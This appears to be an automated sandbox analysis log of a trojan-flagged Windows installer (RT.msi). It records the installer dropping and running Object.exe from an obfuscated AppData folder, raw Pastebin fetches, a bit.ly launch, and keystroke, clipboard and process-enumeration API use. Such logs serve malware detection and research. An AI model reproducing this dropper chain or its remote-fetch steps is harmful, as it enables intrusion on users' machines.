Source: global trafficHTTP traffic detected: GET /js/websetnet.net/wp-content/plugins/cfmonitor/js/check_min.js HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.statically.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /js/websetnet.net/wp-content/plugins/wordpress-popular-posts/assets/js/wpp.min.js HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.statically.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp/c/5.8.2/wp-includes/js/hoverIntent.min.js HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.statically.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /js/websetnet.net/wp-content/themes/genesis/lib/js/menu/superfish.min.js HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.statically.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /js/websetnet.net/wp-content/themes/genesis/lib/js/menu/superfish.args.min.js HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.statically.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /js/websetnet.net/wp-content/themes/genesis/lib/js/skip-links.min.js HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.statically.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /js/websetnet.net/wp-content/themes/magazine-pro/js/responsive-menus.min.js HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.statically.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /js/websetnet.net/wp-content/plugins/sassy-social-share/public/js/sassy-social-share-public.js HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.statically.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /gh/taufik-nurrohman/f3h/v1.0.12/f3h.min.js HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.statically.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp/p/statically/1.2.1/static/pagebooster.js HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.statically.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /metrika/watch.js HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: mc.yandex.ruConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/p3uk77tC HTTP/1.1Host: pastebin.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global trafficHTTP traffic detected: GET /raw/p3uk77tC HTTP/1.1Host: pastebin.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: unknownHTTPS traffic detected: 52.219.96.48:443 -> 192.168.2.3:49752 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.23.98.190:443 -> 192.168.2.3:49756 version: TLS 1.2
Source: unknownHTTPS traffic detected: 67.199.248.10:443 -> 192.168.2.3:49757 version: TLS 1.2
Source: unknownHTTPS traffic detected: 67.199.248.10:443 -> 192.168.2.3:49758 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.9.138:443 -> 192.168.2.3:49759 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.9.138:443 -> 192.168.2.3:49760 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.18.94:443 -> 192.168.2.3:49762 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.18.94:443 -> 192.168.2.3:49764 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.18.94:443 -> 192.168.2.3:49765 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.18.94:443 -> 192.168.2.3:49763 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.18.94:443 -> 192.168.2.3:49766 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.18.94:443 -> 192.168.2.3:49767 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.94.65:443 -> 192.168.2.3:49768 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.159.235:443 -> 192.168.2.3:49775 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.94.65:443 -> 192.168.2.3:49769 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.159.235:443 -> 192.168.2.3:49774 version: TLS 1.2
Source: unknownHTTPS traffic detected: 93.158.134.119:443 -> 192.168.2.3:49791 version: TLS 1.2
Source: unknownHTTPS traffic detected: 93.158.134.119:443 -> 192.168.2.3:49790 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.23.98.190:443 -> 192.168.2.3:49793 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.23.99.190:443 -> 192.168.2.3:49796 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_0045D5E0 GetActiveWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetAsyncKeyState,DeleteObject,DeleteObject,DeleteObject,16_2_0045D5E0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_00455170 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalLock,GlobalFree,GlobalUnlock,GlobalUnlock,SetClipboardData,GlobalAlloc,GlobalLock,GlobalFree,GlobalUnlock,SetClipboardData,CloseClipboard,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,16_2_00455170
Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI71A4.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4c6e29.msiJump to behavior
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00F773E014_2_00F773E0
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00F9619014_2_00F96190
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00FA893A14_2_00FA893A
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00FAF2E814_2_00FAF2E8
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00F9FBF014_2_00F9FBF0
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00F9DBF014_2_00F9DBF0
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00FB0B4914_2_00FB0B49
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00F7CB1014_2_00F7CB10
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00F9AB0C14_2_00F9AB0C
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00FA14C014_2_00FA14C0
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00F7E4B014_2_00F7E4B0
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00FB0C6D14_2_00FB0C6D
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00F79D4014_2_00F79D40
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00F9AD4014_2_00F9AD40
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00FB47F014_2_00FB47F0
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00F967B414_2_00F967B4
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_004570C016_2_004570C0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_004770E016_2_004770E0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_004861A016_2_004861A0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_0045E20016_2_0045E200
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_0049E5C016_2_0049E5C0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_0043A69016_2_0043A690
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_0045E76016_2_0045E760
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_004218D016_2_004218D0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_004C096516_2_004C0965
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_004209C016_2_004209C0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_004CDB1716_2_004CDB17
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_00487B2016_2_00487B20
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_004D8BC416_2_004D8BC4
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_00463D4016_2_00463D40
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_00432EA016_2_00432EA0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_00461F3016_2_00461F30
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_00420FF016_2_00420FF0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_004861A020_2_004861A0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_0045E20020_2_0045E200
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_0049E5C020_2_0049E5C0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_0043A69020_2_0043A690
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_0045E76020_2_0045E760
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_004C096520_2_004C0965
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_004209C020_2_004209C0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_004D8BC420_2_004D8BC4
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_00432EA020_2_00432EA0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_00420FF020_2_00420FF0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_004570C020_2_004570C0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_004770E020_2_004770E0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_004218D020_2_004218D0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_004CDB1720_2_004CDB17
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_00487B2020_2_00487B20
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_00463D4020_2_00463D40
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_004861A022_2_004861A0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_0045E20022_2_0045E200
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_0049E5C022_2_0049E5C0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_0043A69022_2_0043A690
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_0045E76022_2_0045E760
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_004C096522_2_004C0965
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_004209C022_2_004209C0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_004D8BC422_2_004D8BC4
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_004B4CD022_2_004B4CD0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_00432EA022_2_00432EA0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_00420FF022_2_00420FF0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_004570C022_2_004570C0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_004770E022_2_004770E0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_004218D022_2_004218D0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_004CDB1722_2_004CDB17
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_00487B2022_2_00487B20
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_00463D4022_2_00463D40
Source: C:\Windows\Installer\MSIBA90.tmpCode function: String function: 00FB38B2 appears 78 times
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: String function: 00413860 appears 68 times
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: String function: 0043CC00 appears 33 times
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: String function: 004BA730 appears 59 times
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: String function: 00473780 appears 39 times
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: String function: 00468DB0 appears 478 times
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: String function: 0046C890 appears 399 times
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: String function: 00468D80 appears 108 times
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: String function: 0047B1E0 appears 55 times
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: String function: 0041E960 appears 86 times
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: String function: 004CD86E appears 48 times
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: String function: 0046AA30 appears 37 times
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: String function: 004D247C appears 39 times
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: String function: 00413770 appears 128 times
Source: Oleacc.dll.10.drStatic PE information: Resource name: RT_RCDATA type: Zip archive data, at least v2.0 to extract
Source: RT.msiBinary or memory string: OriginalFilenameviewer.exeF vs RT.msi
Source: RT.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs RT.msi
Source: RT.msiBinary or memory string: OriginalFilenameSoftwareDetector.dllF vs RT.msi
Source: RT.msiBinary or memory string: OriginalFilenameFileOperations.dllF vs RT.msi
Source: Object.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Object.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Object.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\RT.msi"
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding DFDBA65093139CBFCFC106788AB0DE76
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIBA90.tmp C:\Windows\Installer\MSIBA90.tmp" /DontWait "C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exe
Source: unknownProcess created: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exe "C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exe"
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe" %1 "https://bit.ly/3DvoVCc
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:640 CREDAT:9474 /prefetch:2
Source: unknownProcess created: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exe "C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exe"
Source: unknownProcess created: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exe "C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exe"
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding DFDBA65093139CBFCFC106788AB0DE76Jump to behavior
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIBA90.tmp C:\Windows\Installer\MSIBA90.tmp" /DontWait "C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe" %1 "https://bit.ly/3DvoVCcJump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:640 CREDAT:9474 /prefetch:2Jump to behavior
Source: C:\Windows\Installer\MSIBA90.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEFJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF975D8E8BA408B701.TMPJump to behavior
Source: classification engineClassification label: mal56.troj.evad.winMSI@13/71@14/10
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00F74B10 CoInitialize,CoCreateInstance,VariantInit,IUnknown_QueryService,IUnknown_QueryInterface_Proxy,IUnknown_QueryInterface_Proxy,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,14_2_00F74B10
Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_0048C090 GetDiskFreeSpaceExW,GetLastError,InterlockedDecrement,16_2_0048C090
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00F737A0 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,14_2_00F737A0
Source: RT.msiStatic file information: TRID: Microsoft Windows Installer (77509/1) 52.18%
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00F74A30 LoadResource,LockResource,SizeofResource,14_2_00F74A30
Source: Object.exeString found in binary or memory: jp-ocr-b-add
Source: Object.exeString found in binary or memory: JIS_C6229-1984-b-add
Source: Object.exeString found in binary or memory: jp-ocr-hand-add
Source: Object.exeString found in binary or memory: JIS_C6229-1984-hand-add
Source: Object.exeString found in binary or memory: ISO_6937-2-add
Source: Object.exeString found in binary or memory: NATS-SEFI-ADD
